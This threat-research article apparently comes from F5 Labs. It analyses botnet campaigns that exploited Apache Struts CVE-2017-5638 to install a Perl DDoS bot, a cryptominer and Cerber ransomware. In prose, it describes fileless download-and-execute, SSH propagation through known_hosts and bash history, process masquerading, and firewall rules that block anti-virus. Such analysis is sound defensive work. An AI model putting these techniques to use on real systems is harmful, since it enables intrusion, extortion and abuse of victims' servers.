A common infection vector used by botnet creators is scanning the Internet for web vulnerabilities to exploit for malware or back doors. The advantage of hitting servers over personal consumer devices is the ability to leverage powerful hardware that is always online and has high bandwidth. Also, many servers do not have anti-virus solutions in place.
As soon as a zero-day remote code execution vulnerability is disclosed, it is common to see many scans in the wild. Some of these scans are researchers, but many of them are hostile exploit attempts. Following the disclosure of “Jakarta Multipart Parser” vulnerability in APACHE STRUTS 2 (CVE-2017-5638)1, F5 researchers observed around 10 different campaigns in the wild. One in particular caught our eye.
This campaign started on the 10th of March, 2017 a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector seemed to be a slight modification of the original public exploit2.
The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.
In the first days of this campaign, shell commands were observed to infect the machine with the “PowerBot” malware, which is written in PERL, and uses DDoS as its main functionality (also known as the PerlBot or Shellbot).
The typical infection tactic for the most commonly observed threat actors, who scan the Internet for web vulnerabilities as their attack strategy, has been to execute commands in several steps: downloading the malware from a remote server, setting it as executable (in the case of binary file), running the malware, and removing the initial infection file.
Conventionally, attack payloads have relied on already installed programs on the target server to download the malware, such as wget and curl. In this campaign, the attacker also leverages the less common “fetch” program as well as a special mode of the “wget”. By using the “wget –qO –“ options, the malware file is downloaded but is not actually written to a file on the disk. Instead, the content is redirected to the Perl interpreter for execution, minimizing the local detectable footprint.
Once the bot is in place, the infected server will connect to an IRC channel to retrieve commands from the botnet master, as shown in Figures 2 and 3. While joining the IRC, F5 researchers observed that the botnet has more than 2,500 victims at the time of this writing, including production servers. And this number is just for a single IRC channel.
By randomly exploring some of the names and IP addresses of the infected hosts connected to the channel, we could find production servers and servers hosted on the AWS infrastructure.
Several days after the beginning of the observed campaign, F5 researchers started seeing a variation of the same campaign. The payload switched from Perl to Bash scripting, but this turned out to be just a spearhead to deploy two different types of malware. The spearhead exploit downloads and executes the same PERL bot.
However, this time, a “minerd” crypto coin mining program will be downloaded as well with all of its prerequisites. The attacker masquerades the malicious process and its configuration with names similar to Apache server, to make it look more innocent when the infected user will list all the running processes.
The bot will then mine coins into several legitimate crypto pools, as shown in the configuration file in Figure 6.
These cryptocoin pools appear to be hosted in France under the “crypto-pool.fr” domain name, as shown in Figure 7.
One of the more fascinating aspects of this malware was the creative technique that the spearhead exploit uses to propagate itself. It will search for all the remote IP addresses that the administrator of the server was connecting to on this server. It searches the SSH “known_hosts” file, which keeps the IP addresses and fingerprints of all the servers to which the administrator was connecting. It also scans the Bash history file for any IP addresses used within the SSH command. Once this list of IP addresses is compiled, the script tries to connect to them via SSH. If the configured authentication was set up to use a key file instead of a username and password, the malware will successfully deploy itself on the remote machine.
In general, threat actors love new zero-days as an opportunity to recycle their campaigns. One of the IP addresses in this campaign originates from Hong Kong, as shown in Figure 9; this address was known before to use the notorious ShellShock (CVE-2014-6271) to deliver similar payloads.
F5 researchers noted that the malware file names have stayed the same – “.mailer” and “a” as shown in Figure 10 and 11. However, the crypto mining pool and the account have been changed, as shown in Figure 12.
Delivering Linux DDoS malware by exploiting web vulnerabilities is commonly observed in the wild, and server ransomware seems to be one of the emerging trends starting from the last year.
The same attacker (surprisingly using the same IP address) behind the previously described Apache STRUTS campaign varied the campaign again during the week of March 20th. This time, the payload infected Windows machines with the “Cerber” ransomware.
The structure of the Jakarta Multipart parser exploit is identical to the attack that was used to deliver previous payloads. However, the current executed shell commands run the Windows BITSAdmin and ftp command line tools (which ship with every Windows server) to download and run the file “1.exe”, as shown in Figure 13.
Once running, the malware encrypts the files and shows an image with a ransom message, as shown in Figure 14.
As per the usual ransomware methods, the victim is given instructions on how to pay the ransom to get their files back, as shown in Figure 15.
F5 researchers analyzed this malware variant and found the author added a functionality of modifying Windows firewall rules to block communication from installed anti-virus software to the world, thus preventing updates and reporting. The specific rules are shown in Figure 16.
To find the installed security products, the malware first runs WMI queries on the “AntiSpywareProduct” and “FirewallProduct” classes.
Then it traverses through files and folders resulted from the query, and adds them to a firewall rule if they are executables.
The attackers running this campaign are using the same Bitcoin ID for a number of campaigns.
This particular account has processed 84 bitcoins, which translates to roughly $86,000 USD at current market value (bitcoin value fluctuates slightly day to day). Since the Struts exploit has become publicly available, we observed 2.2 bitcoins going in and out of this wallet, worth roughly $2,300 USD.
As we have seen in the past, it is amazing how fast existing threat actors using older web vulnerabilities in their campaigns can adapt to switch to newly released zero-days to deliver the same payloads. This gives them a new vulnerability window to exploit while the defenders install patches.
The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers. Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.
In this article we have analyzed only a single campaign targeting Apache STRUTS. There are around 10 additional ones, most of which are reconnaissance, while others deliver traditional Linux DDoS malware.
Check back with F5 Labs for updates on how these campaigns advance.
MODIFIED: Jul 24, 2017